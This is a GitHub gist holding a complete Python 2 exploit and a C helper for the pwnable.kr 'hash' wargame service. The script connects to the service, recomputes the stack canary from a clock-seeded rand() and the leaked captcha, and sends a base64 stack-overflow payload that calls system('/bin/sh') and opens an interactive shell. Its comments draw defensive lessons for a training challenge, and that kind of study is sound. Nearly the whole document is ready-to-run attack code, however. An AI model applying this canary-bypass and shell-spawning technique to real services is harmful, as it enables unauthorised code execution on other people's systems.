
@cubarco
Created March 15, 2016 14:41
#!/usr/bin/env python
# coding=utf8
from pwn import process, p32, remote
from base64 import b64encode
from time import time
from subprocess import check_output
# Proof-of-concept for the pwnable.kr "hash" service (Python 2: note the print
# statement and the str/bytes concatenation below).
#
# What it demonstrates, as modelled by the ./getcanary helper: the service
# hands the client a "captcha" that is the stack canary combined with rand()
# outputs. If the rand() seed is guessable (here: the current time), the
# canary can be recomputed and the stack-smashing check no longer protects
# the overflowed buffer. Defensive takeaway: never disclose a value derived
# from the canary, and never treat clock-seeded rand() output as secret.

# Addresses inside the target binary, used as fixed constants.
# NOTE(review): `system` is presumably a system() call site / PLT entry and
# `buf` the global buffer that receives the base64 text -- neither can be
# confirmed from this script alone.
system = 0x8049187
buf = 0x804B0E0
# p = process('./hash')
p = remote('pwnable.kr', 9002)
# The service prints the captcha and expects it echoed back before continuing.
p.recvuntil('captcha : ')
captcha = int(p.recvline()[:-1])  # strip the trailing newline
p.sendline(str(captcha))
# adjust to pwnable.kr
# The seed passed to the helper is the local clock minus 2 seconds; the offset
# is the author's correction for skew against the server.
# NOTE(review): presumably the service seeds rand() with its own time() at
# connection time -- confirm against the binary.
timenow = int(time()) - 2
canary = int(check_output(['./getcanary', str(timenow), str(captcha)]))
# The helper prints a signed int; mask to an unsigned 32-bit value for p32().
canary &= 0xffffffff
print '[*] canary: ' + hex(canary)
# Layout: 512 filler bytes, the recomputed canary, 12 more filler bytes.
# NOTE(review): the 512 and 12 offsets come from the target's stack frame,
# which is not visible here.
payload = 'A' * 512 + p32(canary) + 'A' * 12
payload += p32(system)
# Pointer to the string that follows the encoded text in `buf`. payload is
# 532 bytes at this point; padding it with p32(0) gives the final 536-byte
# length, so the base64 length computed here equals the length actually sent.
# The +1 skips the NUL byte added on the next line.
payload += p32(buf + 1 + len(b64encode(payload + p32(0))))
# NUL ends the base64 text; the bytes after it are the command string that the
# pointer above refers to.
enc = b64encode(payload) + '\x00/bin/sh' # for system() too
p.sendline(enc)
p.interactive()
#include <stdio.h>
#include <stdlib.h>
/*
 * Recompute a canary candidate from a PRNG seed and an observed captcha.
 *
 * Usage: getcanary <seed> <captcha>
 *
 * Seeds rand() with <seed>, draws eight values, and removes their fixed
 * signed combination from <captcha>. The result is printed as a signed
 * decimal followed by a newline. Exits with -1 when the argument count is
 * wrong; the numeric arguments are parsed with strtol() and not validated.
 *
 * The point this illustrates: rand() is fully reproducible once the seed is
 * known, so a secret that is only masked with rand() outputs and then shown
 * to the client is not secret.
 */
int main(int argc, char *argv[])
{
    int seq[8];
    int idx;
    int seed;
    int captcha;
    int canary;

    if (argc != 3)
        return -1;

    seed = strtol(argv[1], NULL, 10);
    captcha = strtol(argv[2], NULL, 10);

    /* Replay the generator; seq[0] is drawn only to keep the sequence aligned. */
    srand(seed);
    idx = 0;
    while (idx < 8) {
        seq[idx] = rand();
        idx++;
    }

    /* Same term order as the original expression. */
    canary = captcha - seq[1] - seq[5] - seq[2] +
             seq[3] - seq[7] - seq[4] + seq[6];

    printf("%d\n", canary);
    return 0;
}